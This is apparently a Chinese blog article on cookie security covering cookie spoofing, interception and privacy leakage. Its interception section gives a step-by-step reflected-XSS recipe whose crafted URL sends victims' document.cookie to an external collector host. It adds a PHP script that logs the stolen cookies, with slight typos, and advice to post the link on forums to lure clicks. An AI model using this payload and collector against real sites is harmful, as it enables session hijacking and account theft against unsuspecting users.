Cookie的目的是為用戶帶來方便,為網(wǎng)站帶來增值,一般情況下不會造成嚴(yán)重的安全威脅。Cookie文件不能作為代碼執(zhí)行,也不會傳送病毒,它為用戶所專有并只能由創(chuàng)建它的服務(wù)器來讀取。另外,瀏覽器一般只允許存放300個Cookie,每個站點最多存放20個Cookie,每個Cookie的大小限制為4KB,因此,Cookie不會塞滿硬盤,更不會被用作"拒絕服務(wù)"攻擊手段。
但是,Cookie作為用戶身份的替代,其安全性有時決定了整個系統(tǒng)的安全性,Cookie的安全性問題不容忽視。
(1)Cookie欺騙 Cookie記錄了用戶的帳戶ID、密碼之類的信息,通常使用MD5方法加密后在網(wǎng)上傳遞。經(jīng)過加密處理后的信息即使被網(wǎng)絡(luò)上一些別有用心的人截獲也看不懂。然而,現(xiàn)在存在的問題是,截獲Cookie的人不需要知道這些字符串的含義,只要把別人的Cookie向服務(wù)器提交,并且能夠通過驗證,就可以冒充受害人的身份登陸網(wǎng)站,這種行為叫做Cookie欺騙。
非法用戶通過Cookie欺騙獲得相應(yīng)的加密密鑰,從而訪問合法用戶的所有個性化信息,包括用戶的E-mail甚至帳戶信息,對個人信息造成嚴(yán)重危害。
(2)Cookie截獲
Cookie以純文本的形式在瀏覽器和服務(wù)器之間傳送,很容易被他人非法截獲和利用。任何可以截獲Web通信的人都可以讀取Cookie。
Cookie被非法用戶截獲后,然后在其有效期內(nèi)重放,則此非法用戶將享有合法用戶的權(quán)益。例如,對于在線閱讀,非法用戶可以不支付費用即可享受在線閱讀電子雜志。
Cookie截獲的手段有以下一些:
(1)用編程手段截獲Cookie。下面分析其手法,該方法分兩步完成。
步驟一:定位需要收集Cookie的網(wǎng)站,對其進行分析并構(gòu)造URL。 首先打開要收集Cookie的網(wǎng)站,這里假設(shè)是http://www.XXX.net,登陸網(wǎng)站輸入用戶名"<Al>"(不含引號),對數(shù)據(jù)進行分析抓包,得到如下代碼:
http://www.XXX.net/tXl/login/login.pl?username=<Al>&passwd=&ok.X=28&ok.y=6;
將其中"<Al>"更換為:
"<script>alert(document.cookie)</script>"再試,如果執(zhí)行成功,就開始構(gòu)造URL:
http://www.XXX.net/tXl/login/login.pl?username=<script>window.open ("http://www.cbifamily.org/cbi.php?"%2bdocument.cookie)</script>&passwd=&ok.X=28&ok.y=6.
其中http://www.cbifamily.org/cbi.php是用戶能夠控制的某臺主機上的一個腳本。需要注意的是"%2b"為符號"+"的URL編碼,因為"+"將被作為空格處理。該URL即可在論壇中發(fā)布,誘使別人點擊。
步驟二:編制收集Cookie的PHP腳本,并將其放到用戶可以控制的網(wǎng)站上,當(dāng)不知情者點擊了構(gòu)造的URL后可以執(zhí)行該PHP代碼。該腳本的具體內(nèi)容如下:
<?php
$info=getenv("OUERY_STRING");
if($info){
$fp=fopen("info.tXt","a");
fwrite($fp,!info."/n");
fclose($fp);
}
header("Location:http://www.XXX.net");
?>
將這段代碼放到網(wǎng)絡(luò)里,則能夠收集所有人的Cookie。如果一個論壇允許HTML代碼或者允許使用Flash標(biāo)簽,就可以利用這些技術(shù)收集Cookie的代碼放到論壇里,然后給帖子取一個吸引人的主題,寫上有趣的內(nèi)容,很快就可收集到大量的Cookie。在論壇上,有許多人的密碼就是被這種方法盜走的。
(2)利用Flash的代碼隱患截獲Cookie。Flash中有一個getURL()函數(shù)。Flash可以利用這個函數(shù)自動打開指定的網(wǎng)頁,它可能把用戶引向一個包含惡意代碼的網(wǎng)站。例如,當(dāng)用戶在電腦上欣賞Flash動畫時,動畫幀里的代碼可能已經(jīng)悄悄地連上網(wǎng),并打開了一個極小的包含有特殊代碼的頁面,這個頁面可以收集Cookie、也可以做一些其他有害的事情。網(wǎng)站無法禁止Flash的這種作為,因為這是Flash文件的內(nèi)部功能。
(3)Cookie泄漏網(wǎng)絡(luò)隱私
Cookie導(dǎo)致網(wǎng)絡(luò)隱私泄密的主要原因是:!商業(yè)利益驅(qū)動。隨著電子商務(wù)的興起和互聯(lián)網(wǎng)上巨大商機的出現(xiàn),一些網(wǎng)站和機構(gòu)濫用Cookie,未經(jīng)訪問者的許可,利用搜索引擎技術(shù)、數(shù)據(jù)挖掘技術(shù)甚至是網(wǎng)絡(luò)欺騙技術(shù)搜集他人的個人資料,達到構(gòu)建用戶數(shù)據(jù)庫、發(fā)送廣告等營利目的,造成用戶個人隱私的泄漏。"Cookie信息傳遞的開放性。Cookie文件具有特殊的傳遞流程 和文本特性,在服務(wù)器和客戶端之間傳送未經(jīng)安全加密的Cook-ie文件,易導(dǎo)致個人信息的泄密。
以上都是個人對于cookie安全性的理解,如有遺漏還請大家能夠指正。
